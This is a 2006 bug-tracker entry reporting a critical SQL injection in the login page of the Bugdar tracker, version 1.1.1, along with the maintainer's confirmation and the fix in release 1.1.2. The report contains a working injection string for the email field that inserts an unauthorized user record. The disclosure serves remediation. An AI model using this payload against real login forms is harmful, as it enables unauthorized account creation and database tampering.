Hello, guest. We have noticed that you are not registered at this bug tracker. Your experience will be greatly enhanced if you log in. To do so, you first must register by clicking on the Register tab at the top. If you are already registered, you can login at the Login tab.
Syndicate Syndicate Listing Display Search Login/Register
Bug Id ?
Reporter ?
Michael von Känel
Product/Version ?
Bugdar / 1.1.1
Status ?
Closed
Severity ?
Critical
Duplicate Of ?
- none -
Fixed in Revision ?
1248
Mstone ?
Summary ?
SQL Injection on login.php
Report Time ?
October 12, 2006 02:30 PM
Assignment ?
Resolution ?
Fixed
Priority ?
Normal
Dependencies ?
- none -
Mstone (old) ?


Votes
For: 0 (0%)
Against: 0 (0%)
Total: 0

October 12, 2006 02:30 PM Michael von Känel
I think on login.php could be a issue.

you can spimly enter in the email field on login.php a sql String.

Try add this one:
'; INSERT INTO `user` ( `userid` , `email` , `displayname` , `usergroupid` , `password` , `salt` , `authkey` , `showemail` , `showcolors` , `languageid` , `timezone` , `usedst` , `hidestatuses` , `defaultsortkey` , `defaultsortas` ) VALUES ('', 'got', 'you', '0', '', '', '', '0', NULL , '0', '0', '0', '', NULL , NULL); -- '




October 12, 2006 06:17 PM Robert
Confirmed and marking security issue (hidden).

October 12, 2006 08:01 PM Robert
I'm now in the process of auditing all the Bugdar code. A 1.1.2 release will be issued promptly once the code is security checked and retested. Thank you for bringing this to my attention.

October 13, 2006 12:31 AM Robert
Thank you for your bug report. This issue has been closed and fixed in Subversion. This change will be available in a future release, but you can download the change at any time from the Subversion server.

October 13, 2006 12:50 AM Robert
Bugdar 1.1.2 is now released with this and two other security issues resolved. Unmarking as security and making visible.